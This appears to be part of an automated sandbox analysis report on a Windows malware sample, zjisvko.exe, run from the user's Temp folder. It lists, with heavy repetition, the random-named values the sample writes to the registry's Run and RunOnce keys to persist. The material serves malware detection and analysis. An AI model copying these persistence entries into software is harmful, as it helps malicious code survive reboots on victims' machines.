Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce yrzsecpaticodwrcJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce fzicpocoiytgwqmyrJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run qfjygajqfqgoJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce pfkajeowmypykJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run tlskvseogunymeyJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run ojtoccrezqmarmjwqlJump to behavior
